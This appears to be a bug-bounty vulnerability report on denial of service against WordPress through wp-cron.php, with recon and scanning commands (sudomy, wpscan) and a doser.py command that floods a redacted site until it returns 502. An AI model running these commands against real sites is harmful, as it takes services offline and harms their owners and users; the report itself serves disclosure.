WordPress application vulnerable to DoS attack via wp-cron.php
Overview of the Vulnerability:
The WordPress application is vulnerable to a Denial of Service (DoS) attack via the wp-cron.php script. This script is used by WordPress to perform scheduled tasks, such as publishing scheduled posts, checking for updates, and running plugins.
An attacker can exploit this vulnerability by sending a large number of requests to the wp-cron.php script, causing it to consume excessive resources and overload the server. This can lead to the application becoming unresponsive or crashing, potentially causing data loss and downtime.
Steps:
- The best tool “sudomy” for obtaining comprehensive information about my goal during the reconnaissance stage provides many many features that you can review “https://github.com/screetsec/Sudomy”
sudomy -d example.com -cF -tO -gW --httpx --dnsx -aI webanalyze --slack -sS2. To obtain the technologies used, open the “webanalyze.txt” file.
Find WordPress
3. Use “wpscan” to search for security vulnerabilities in the site or plugins
wpscan --url https://[Redacted].[Redacted].com/ --wp-content-dir --wp-plugins-dir -e vp dbe vt --random-user-agentFor best use, use the token from “wpscan” by creating an account. Among the advantages is that it shows you the latest “CVE”
wpscan --url https://[Redacted].[Redacted].com/ --wp-content-dir --wp-plugins-dir -e vp dbe vt --random-user-agent --api-token [Redacted]
4. Get the doser.py script at https://github.com/Quitten/doser.py
5. Use this command to run the script:
python3 doser.py -t 999 -g 'https://[Redacted].[Redacted].com/wp-cron.php'6. Go to https://[Redacted].[Redacted].com after 1000 requests of the doser.py script.
7. The site returns code 502.
Impact:
- Denial of Service (DoS) attacks, rendering the application unavailable.
- Server overload and increased resource usage, leading to slow response times or application crashes.
- Potential data loss and downtime.
Note:
Before you test DoS, make sure that it is within the range of tests allowed within the program
